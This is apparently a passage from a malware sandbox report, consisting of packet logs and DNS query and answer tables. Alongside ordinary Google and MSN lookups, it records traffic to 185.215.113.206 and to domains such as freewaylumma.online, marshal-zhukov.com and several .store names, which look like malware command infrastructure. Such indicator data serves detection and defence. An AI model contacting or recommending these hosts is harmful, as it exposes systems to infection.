Nov 12, 2024 00:06:27.691010952 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691023111 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691034079 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691034079 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691045046 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691046000 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691059113 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691075087 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691075087 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691087008 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691092968 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691098928 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691102028 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691111088 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691123009 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691124916 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691139936 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691165924 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691342115 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691355944 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691366911 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691378117 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691387892 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691395044 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691400051 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691411018 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691414118 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691422939 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691430092 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691433907 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691452980 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691463947 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691463947 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691476107 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691493034 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691493988 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691503048 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691505909 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691519976 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691531897 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691531897 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691544056 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691556931 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691561937 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691567898 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691569090 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691580057 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691591978 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691597939 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691603899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691613913 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691631079 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691631079 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691651106 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691652060 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691663980 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691667080 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691677094 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691690922 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691698074 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691701889 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691704988 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691714048 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691725016 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691735983 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691735983 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691747904 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691760063 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691764116 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691771030 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691781998 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691788912 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691792965 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691806078 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691807985 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691817999 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691824913 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691829920 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691836119 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691840887 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691849947 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691852093 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691864967 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.691886902 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.691900015 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.711117029 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.711385965 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.786633015 CET	443	49856	108.139.47.33	192.168.2.5
Nov 12, 2024 00:06:27.787842989 CET	49856	443	192.168.2.5	108.139.47.33
Nov 12, 2024 00:06:27.787874937 CET	443	49856	108.139.47.33	192.168.2.5
Nov 12, 2024 00:06:27.788245916 CET	443	49856	108.139.47.33	192.168.2.5
Nov 12, 2024 00:06:27.788538933 CET	49856	443	192.168.2.5	108.139.47.33
Nov 12, 2024 00:06:27.788604975 CET	443	49856	108.139.47.33	192.168.2.5
Nov 12, 2024 00:06:27.788700104 CET	49856	443	192.168.2.5	108.139.47.33
Nov 12, 2024 00:06:27.830329895 CET	49847	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.835335970 CET	443	49856	108.139.47.33	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 12, 2024 00:06:08.939266920 CET	192.168.2.5	1.1.1.1	0x1387	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:08.939659119 CET	192.168.2.5	1.1.1.1	0x17fe	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 12, 2024 00:06:11.418880939 CET	192.168.2.5	1.1.1.1	0x52b7	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:11.419034004 CET	192.168.2.5	1.1.1.1	0xf4c2	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Nov 12, 2024 00:06:12.399909019 CET	192.168.2.5	1.1.1.1	0xf91	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:12.400057077 CET	192.168.2.5	1.1.1.1	0x8eca	Standard query (0)	play.google.com	65	IN (0x0001)	false
Nov 12, 2024 00:06:18.903641939 CET	192.168.2.5	1.1.1.1	0x8d48	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:18.903980970 CET	192.168.2.5	1.1.1.1	0x1d48	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Nov 12, 2024 00:06:19.737524986 CET	192.168.2.5	1.1.1.1	0x5458	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:19.737701893 CET	192.168.2.5	1.1.1.1	0x90fa	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 12, 2024 00:06:22.613323927 CET	192.168.2.5	1.1.1.1	0xf8ab	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:22.613708973 CET	192.168.2.5	1.1.1.1	0xf714	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Nov 12, 2024 00:06:22.624923944 CET	192.168.2.5	1.1.1.1	0xef84	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:22.625032902 CET	192.168.2.5	1.1.1.1	0xdf9d	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Nov 12, 2024 00:06:22.628957033 CET	192.168.2.5	1.1.1.1	0x6d44	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:22.629112959 CET	192.168.2.5	1.1.1.1	0xe4e7	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Nov 12, 2024 00:06:22.638020992 CET	192.168.2.5	1.1.1.1	0x4587	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:22.638189077 CET	192.168.2.5	1.1.1.1	0xa160	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Nov 12, 2024 00:06:23.828353882 CET	192.168.2.5	1.1.1.1	0x1222	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:23.828773975 CET	192.168.2.5	1.1.1.1	0x7d34	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 12, 2024 00:06:23.829672098 CET	192.168.2.5	1.1.1.1	0x2d90	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:23.830102921 CET	192.168.2.5	1.1.1.1	0x2f2b	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 12, 2024 00:06:23.873195887 CET	192.168.2.5	1.1.1.1	0xe9de	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:23.873431921 CET	192.168.2.5	1.1.1.1	0xf664	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 12, 2024 00:07:11.032664061 CET	192.168.2.5	1.1.1.1	0xb38a	Standard query (0)	frogmen-smell.sbs	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:14.177334070 CET	192.168.2.5	1.1.1.1	0x202d	Standard query (0)	freewaylumma.online	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:17.302067995 CET	192.168.2.5	1.1.1.1	0xd1a5	Standard query (0)	cl.oud-cdn.de	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:20.181545019 CET	192.168.2.5	1.1.1.1	0x91e7	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:20.181853056 CET	192.168.2.5	1.1.1.1	0x740c	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 12, 2024 00:07:20.193515062 CET	192.168.2.5	1.1.1.1	0xbcaf	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:20.193701982 CET	192.168.2.5	1.1.1.1	0xa892	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 12, 2024 00:07:20.197175980 CET	192.168.2.5	1.1.1.1	0xf41c	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:20.197331905 CET	192.168.2.5	1.1.1.1	0x2de7	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 12, 2024 00:07:21.884469032 CET	192.168.2.5	1.1.1.1	0xd454	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:21.918948889 CET	192.168.2.5	1.1.1.1	0xa45c	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:21.946767092 CET	192.168.2.5	1.1.1.1	0xb6d9	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:21.986433983 CET	192.168.2.5	1.1.1.1	0x2979	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:22.018387079 CET	192.168.2.5	1.1.1.1	0xd65a	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:22.055144072 CET	192.168.2.5	1.1.1.1	0xabe0	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:22.087574959 CET	192.168.2.5	1.1.1.1	0x827	Standard query (0)	navygenerayk.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:22.114850998 CET	192.168.2.5	1.1.1.1	0x69b3	Standard query (0)	scriptyprefej.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:22.150293112 CET	192.168.2.5	1.1.1.1	0x2691	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:23.516422033 CET	192.168.2.5	1.1.1.1	0xea67	Standard query (0)	marshal-zhukov.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.539464951 CET	192.168.2.5	1.1.1.1	0xf391	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.568073988 CET	192.168.2.5	1.1.1.1	0xd5e	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.595891953 CET	192.168.2.5	1.1.1.1	0x16f	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.679867983 CET	192.168.2.5	1.1.1.1	0x805d	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.706084013 CET	192.168.2.5	1.1.1.1	0xaebb	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.732417107 CET	192.168.2.5	1.1.1.1	0x645c	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.761514902 CET	192.168.2.5	1.1.1.1	0x16ed	Standard query (0)	navygenerayk.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.816740990 CET	192.168.2.5	1.1.1.1	0x9727	Standard query (0)	scriptyprefej.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.844073057 CET	192.168.2.5	1.1.1.1	0xecee	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.381356001 CET	192.168.2.5	1.1.1.1	0x5d	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.410126925 CET	192.168.2.5	1.1.1.1	0x52fa	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.436345100 CET	192.168.2.5	1.1.1.1	0xabd4	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.466018915 CET	192.168.2.5	1.1.1.1	0x49c4	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.492918968 CET	192.168.2.5	1.1.1.1	0xd8ed	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.519799948 CET	192.168.2.5	1.1.1.1	0xd8f3	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.546889067 CET	192.168.2.5	1.1.1.1	0x7122	Standard query (0)	navygenerayk.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.573473930 CET	192.168.2.5	1.1.1.1	0x9f06	Standard query (0)	scriptyprefej.store	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.601063013 CET	192.168.2.5	1.1.1.1	0x6d37	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
2024-11-11 23:06:25 UTC	192.168.2.5	172.64.41.3	0x0	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	true
2024-11-11 23:06:25 UTC	192.168.2.5	172.64.41.3	0x0	Standard query (0)	assets.msn.com	65	IN (0x0001)	true
2024-11-11 23:07:24 UTC	192.168.2.5	162.159.61.3	0x0	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	true
2024-11-11 23:07:24 UTC	192.168.2.5	162.159.61.3	0x0	Standard query (0)	ntp.msn.com	65	IN (0x0001)	true

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 12, 2024 00:06:08.946007013 CET	1.1.1.1	192.168.2.5	0x1387	No error (0)	www.google.com		142.250.185.196	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:08.946187973 CET	1.1.1.1	192.168.2.5	0x17fe	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 12, 2024 00:06:11.426142931 CET	1.1.1.1	192.168.2.5	0xf4c2	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 00:06:11.426155090 CET	1.1.1.1	192.168.2.5	0x52b7	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 00:06:11.426155090 CET	1.1.1.1	192.168.2.5	0x52b7	No error (0)	plus.l.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:12.406841993 CET	1.1.1.1	192.168.2.5	0xf91	No error (0)	play.google.com		142.250.186.110	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:18.911303043 CET	1.1.1.1	192.168.2.5	0x8d48	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 00:06:18.911890984 CET	1.1.1.1	192.168.2.5	0x1d48	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 00:06:19.039261103 CET	1.1.1.1	192.168.2.5	0x3cb1	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 00:06:19.081337929 CET	1.1.1.1	192.168.2.5	0x8ede	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 00:06:19.081337929 CET	1.1.1.1	192.168.2.5	0x8ede	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:19.744821072 CET	1.1.1.1	192.168.2.5	0x90fa	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 00:06:19.745851994 CET	1.1.1.1	192.168.2.5	0x5458	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 00:06:22.620881081 CET	1.1.1.1	192.168.2.5	0xf8ab	No error (0)	sb.scorecardresearch.com		18.244.18.32	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:22.620881081 CET	1.1.1.1	192.168.2.5	0xf8ab	No error (0)	sb.scorecardresearch.com		18.244.18.122	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:22.620881081 CET	1.1.1.1	192.168.2.5	0xf8ab	No error (0)	sb.scorecardresearch.com		18.244.18.27	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:22.620881081 CET	1.1.1.1	192.168.2.5	0xf8ab	No error (0)	sb.scorecardresearch.com		18.244.18.38	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:22.632103920 CET	1.1.1.1	192.168.2.5	0xdf9d	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 00:06:22.632113934 CET	1.1.1.1	192.168.2.5	0xef84	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 00:06:22.635734081 CET	1.1.1.1	192.168.2.5	0x6d44	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 00:06:22.636281967 CET	1.1.1.1	192.168.2.5	0xe4e7	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 00:06:22.644673109 CET	1.1.1.1	192.168.2.5	0xa160	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 00:06:22.646919012 CET	1.1.1.1	192.168.2.5	0x4587	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 00:06:23.122051001 CET	1.1.1.1	192.168.2.5	0x59c6	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 00:06:23.835225105 CET	1.1.1.1	192.168.2.5	0x1222	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:23.835225105 CET	1.1.1.1	192.168.2.5	0x1222	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:23.835629940 CET	1.1.1.1	192.168.2.5	0x7d34	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 12, 2024 00:06:23.836447001 CET	1.1.1.1	192.168.2.5	0x2d90	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:23.836447001 CET	1.1.1.1	192.168.2.5	0x2d90	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:23.836685896 CET	1.1.1.1	192.168.2.5	0x2f2b	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 12, 2024 00:06:23.879939079 CET	1.1.1.1	192.168.2.5	0xe9de	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:23.879939079 CET	1.1.1.1	192.168.2.5	0xe9de	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:06:23.880024910 CET	1.1.1.1	192.168.2.5	0xf664	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 12, 2024 00:07:11.094824076 CET	1.1.1.1	192.168.2.5	0xb38a	No error (0)	frogmen-smell.sbs		172.67.174.133	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:11.094824076 CET	1.1.1.1	192.168.2.5	0xb38a	No error (0)	frogmen-smell.sbs		104.21.80.55	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:14.184638023 CET	1.1.1.1	192.168.2.5	0x202d	No error (0)	freewaylumma.online		192.64.117.218	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:17.352441072 CET	1.1.1.1	192.168.2.5	0xd1a5	No error (0)	cl.oud-cdn.de		176.9.192.202	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:20.188452005 CET	1.1.1.1	192.168.2.5	0x91e7	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:20.188452005 CET	1.1.1.1	192.168.2.5	0x91e7	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:20.188508034 CET	1.1.1.1	192.168.2.5	0x740c	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 12, 2024 00:07:20.200153112 CET	1.1.1.1	192.168.2.5	0xbcaf	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:20.200153112 CET	1.1.1.1	192.168.2.5	0xbcaf	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:20.200777054 CET	1.1.1.1	192.168.2.5	0xa892	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 12, 2024 00:07:20.203725100 CET	1.1.1.1	192.168.2.5	0xf41c	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:20.203725100 CET	1.1.1.1	192.168.2.5	0xf41c	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:20.203891993 CET	1.1.1.1	192.168.2.5	0x2de7	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 12, 2024 00:07:21.909799099 CET	1.1.1.1	192.168.2.5	0xd454	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:21.943301916 CET	1.1.1.1	192.168.2.5	0xa45c	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:21.982956886 CET	1.1.1.1	192.168.2.5	0xb6d9	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:22.013467073 CET	1.1.1.1	192.168.2.5	0x2979	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:22.049904108 CET	1.1.1.1	192.168.2.5	0xd65a	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:22.080384016 CET	1.1.1.1	192.168.2.5	0xabe0	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:22.112569094 CET	1.1.1.1	192.168.2.5	0x827	Name error (3)	navygenerayk.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:22.146585941 CET	1.1.1.1	192.168.2.5	0x69b3	Name error (3)	scriptyprefej.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:22.157151937 CET	1.1.1.1	192.168.2.5	0x2691	No error (0)	steamcommunity.com		23.210.122.61	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:23.527580023 CET	1.1.1.1	192.168.2.5	0xea67	No error (0)	marshal-zhukov.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:23.527580023 CET	1.1.1.1	192.168.2.5	0xea67	No error (0)	marshal-zhukov.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.564368963 CET	1.1.1.1	192.168.2.5	0xf391	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.592472076 CET	1.1.1.1	192.168.2.5	0xd5e	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.627438068 CET	1.1.1.1	192.168.2.5	0x16f	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.704710007 CET	1.1.1.1	192.168.2.5	0x805d	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
